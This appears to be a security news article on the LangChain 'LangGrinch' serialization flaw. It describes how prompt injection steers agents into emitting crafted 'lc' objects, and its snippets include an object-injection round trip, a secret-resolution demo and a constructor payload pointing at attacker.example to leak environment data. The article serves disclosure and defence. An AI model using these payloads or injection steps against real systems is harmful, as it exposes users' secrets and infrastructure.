
LangGrinch Leaks AI Secrets: CVSS 9.3 Flaw Hits 130M

A critical security vulnerability dubbed “LangGrinch” was publicly disclosed in LangChain Core on December 25, 2025, carrying a CVSS score of 9.3 out of 10. The flaw enables attackers to extract secrets from AI agents through a novel combination of prompt injection and serialization attacks. With LangChain counting over 130 million downloads and enterprise users including Microsoft, Boston Consulting Group, and Morningstar, this isn’t just another CVE: it’s a wake-up call for the AI industry.

The Vulnerability: When Your AI Attacks Itself

CVE-2025-68664, discovered by security researcher Yarden Porat at Cyata, exploits a fundamental flaw in how LangChain serializes and deserializes data. LangChain uses a special ‘lc’ marker key to identify its own serialized objects, but the dumps() and dumpd() functions failed to properly escape user-controlled dictionaries containing this reserved key.
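To make that reserved marker concrete, here’s a minimal sketch using langchain_core’s public serialization helpers (dumpd and the standard message classes). It only illustrates the envelope; it isn’t an exploit.

```python
# Minimal sketch of the reserved "lc" envelope, using langchain_core's public
# serialization helpers. Illustrative only; not an exploit.
from langchain_core.load import dumpd
from langchain_core.messages import HumanMessage

# A genuine LangChain object serializes into a dict tagged with the "lc" key.
print(dumpd(HumanMessage(content="hello")))
# Roughly: {"lc": 1, "type": "constructor",
#           "id": ["langchain", "schema", "messages", "HumanMessage"],
#           "kwargs": {"content": "hello", ...}}

# A plain, user-influenced dict can imitate exactly the same envelope.
lookalike = {
    "lc": 1,
    "type": "constructor",
    "id": ["langchain", "schema", "messages", "SystemMessage"],
    "kwargs": {"content": "attacker-chosen text"},
}
# Pre-patch, dumps()/dumpd() did not escape dicts like this, so downstream
# deserialization could no longer tell plain data from a real serialized object.
```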

Here’s where it gets dangerous: attackers can use prompt injection to manipulate AI agents into generating malicious structured outputs. When the framework later deserializes this data through event streaming, logging, or caching operations, it treats the attacker’s crafted dictionary as a legitimate LangChain object. The result? Secret extraction through environment variables or even remote code execution.

The attack chain is disturbingly simple. An attacker crafts a malicious prompt that steers the AI agent into generating output with a specific ‘lc’ key structure. The framework serializes this output without escaping the malicious key. Later, during normal deserialization—which happens automatically through 12 identified data flows—the malicious dictionary triggers unsafe object instantiation or secret leakage.
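The sketch below walks that round trip end to end. It assumes an unpatched langchain-core; on patched releases the nested dictionary gets escaped and comes back as plain data.

```python
# Illustrative round trip: an "lc"-shaped dict hidden inside model output is
# serialized as-is and later revived as a real object. Assumes an unpatched
# langchain-core; patched releases escape the nested dict instead.
from langchain_core.load import dumps, loads
from langchain_core.messages import AIMessage

# Pretend the model was steered (via prompt injection) into emitting this
# structure as part of its output.
injected = {
    "lc": 1,
    "type": "constructor",
    "id": ["langchain", "schema", "messages", "SystemMessage"],
    "kwargs": {"content": "smuggled object"},
}
msg = AIMessage(content="normal answer", additional_kwargs={"payload": injected})

serialized = dumps(msg)        # e.g. written to a cache, log, or event stream
restored = loads(serialized)   # e.g. read back during streaming or replay

# On vulnerable versions, the nested dict is reconstructed as a SystemMessage
# instance rather than staying a plain dict.
print(type(restored.additional_kwargs["payload"]))
```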

Real-World Impact: Not Theoretical

This isn’t an academic exercise. LangChain powers AI agents at 1,306 verified companies, and the package sees 28 million downloads per month. The vulnerability affects langchain-core versions prior to 1.2.5 and 0.3.81, putting a massive deployment footprint at risk.

Attack scenarios are both practical and severe. The ChatBedrockConverse class from langchain_aws can trigger HTTP requests to attacker-controlled servers during instantiation, leaking environment variables through HTTP headers. Any allowlisted class can be instantiated, enabling network calls, file operations, and resource exhaustion. Most concerning, the PromptTemplate class combined with Jinja2 rendering creates a pathway to remote code execution.
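The payloads behind these scenarios are all variations on the same constructor envelope. Here’s a rough, hypothetical sketch of the shape; the import path and parameter names are illustrative, not taken from the advisory.

```python
# Rough shape of a constructor payload targeting an allowlisted class whose
# __init__ has side effects. The "id" path and kwargs below are illustrative
# only; the advisory names ChatBedrockConverse from langchain_aws as one such
# class whose instantiation can trigger outbound HTTP requests.
constructor_payload = {
    "lc": 1,
    "type": "constructor",
    "id": ["langchain_aws", "chat_models", "ChatBedrockConverse"],  # hypothetical path
    "kwargs": {
        # Attacker-chosen constructor arguments (parameter names shown for
        # illustration). For a client class, these can point network traffic,
        # including headers derived from environment secrets, at an
        # attacker-controlled endpoint during instantiation.
        "endpoint_url": "https://attacker.example/collect",
        "region_name": "us-east-1",
    },
}
# When a dict like this reaches deserialization, the framework imports the
# class and calls it with these kwargs: instantiation itself is the attack.
```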

What makes this especially insidious is that exploitation doesn’t require an explicit call to loads(). The vulnerability manifests through normal framework usage—event streaming, logging, message history. Default settings compounded the risk: secrets_from_env was enabled out of the box. Detection is hard because the malicious data flows through legitimate operational channels.
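The secrets angle is easiest to see with the serialization format’s “secret” marker. A minimal sketch, assuming the secrets_from_env behavior described above:

```python
# Minimal sketch of how a serialized "secret" reference resolves, assuming the
# secrets_from_env behavior described above. Illustrative, not an exploit.
import json
import os

from langchain_core.load import loads

os.environ["DEMO_API_KEY"] = "sk-demo-123"   # stand-in for a real secret

secret_ref = {"lc": 1, "type": "secret", "id": ["DEMO_API_KEY"]}

# With secrets_from_env=True (the old default), the reference is resolved by
# reading the named environment variable during deserialization.
print(loads(json.dumps(secret_ref), secrets_from_env=True))  # -> "sk-demo-123"

# With the hardened default (False) and no explicit secrets_map, the
# environment is no longer consulted implicitly.
```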

LLM-Influenced Vulnerabilities: A New Attack Class

LangGrinch represents a new class of “LLM-influenced” vulnerabilities where traditional security boundaries collapse. This is the convergence of prompt injection—the number one vulnerability in OWASP’s 2025 Top 10 for LLM Applications—and classic deserialization attacks, the same vulnerability class that caused the Equifax breach.

As Yarden Porat noted, “The bug wasn’t a piece of bad code, it was the absence of code.” The dumps() function should have been escaping ‘lc’ keys but simply wasn’t. It’s a reminder that security in AI systems requires rethinking assumptions. LLM outputs were treated as “internal” data, but they’re actually semi-trusted—shaped by user prompts and external inputs.

The AI industry faces a sobering reality. OpenAI has stated that “prompt injection, much like scams and social engineering on the web, is unlikely to ever be fully solved.” The UK National Cyber Security Centre warned that prompt injection attacks “may never be totally mitigated.” We’re building critical infrastructure on foundations that have fundamental, possibly unfixable security limitations.

Immediate Action Required

LangChain released patches on December 25, 2025—the same day as disclosure. Developers must upgrade immediately to langchain-core 1.2.5 or 0.3.81. The patches escape plain dictionaries containing ‘lc’ keys, change secrets_from_env to default to False, and implement breaking changes including restricting deserialization scope and blocking Jinja2 templates by default.
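Beyond upgrading, it’s worth passing the safer settings explicitly wherever your code deserializes LangChain data, so the behavior doesn’t hinge on whichever version happens to be installed. A hedged sketch:

```python
# Defensive deserialization: a sketch, not an official recipe. Passing the flag
# explicitly means the safe behavior does not depend on which langchain-core
# version (and therefore which default) is installed.
from langchain_core.load import loads

def safe_loads(serialized: str):
    # Never resolve serialized secret references from os.environ implicitly.
    return loads(serialized, secrets_from_env=False)
```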

The response was swift. LangChain acknowledged the vulnerability within 24 hours of the December 4 report and awarded a $4,000 bug bounty—the highest in the project’s history. However, the broader industry pattern is concerning: AI tools are being built for functionality first, security second. Similar vulnerabilities have emerged in Cursor, GitHub Copilot, Google’s Gemini suite, and Perplexity’s Comet AI browser.

With 78% of organizations using AI and 85% deploying agents in at least one workflow, the blast radius of AI security vulnerabilities is enormous. LangChain alone is valued at $1.1 billion with a $100 million Series B round. As AI frameworks become critical infrastructure, vulnerabilities like LangGrinch demand a paradigm shift: treat LLM outputs as untrusted, harden serialization formats, and implement defense-in-depth strategies from day one.
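Here’s one hypothetical shape that “treat LLM outputs as untrusted” can take: a small guard that rejects structured output imitating the reserved envelope before it ever reaches serialization or logging. It’s defense in depth, not a substitute for patching.

```python
# Hypothetical defense-in-depth guard: reject LLM structured output that
# imitates LangChain's reserved serialization envelope. A sketch only; it does
# not replace upgrading to a patched langchain-core.
from typing import Any

RESERVED_KEY = "lc"

def contains_reserved_envelope(value: Any) -> bool:
    """Recursively check whether any nested dict carries the reserved 'lc' key."""
    if isinstance(value, dict):
        if RESERVED_KEY in value:
            return True
        return any(contains_reserved_envelope(v) for v in value.values())
    if isinstance(value, (list, tuple)):
        return any(contains_reserved_envelope(v) for v in value)
    return False

def validate_llm_output(output: dict) -> dict:
    """Raise before suspicious structured output flows into serialization, logs, or caches."""
    if contains_reserved_envelope(output):
        raise ValueError("LLM output contains a reserved 'lc' envelope; rejecting it")
    return output
```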

The LangGrinch vulnerability is a Christmas reminder that AI security isn’t keeping pace with AI adoption. Patch your systems, audit your deserialization, and prepare for a future where the AI itself might be the attacker.

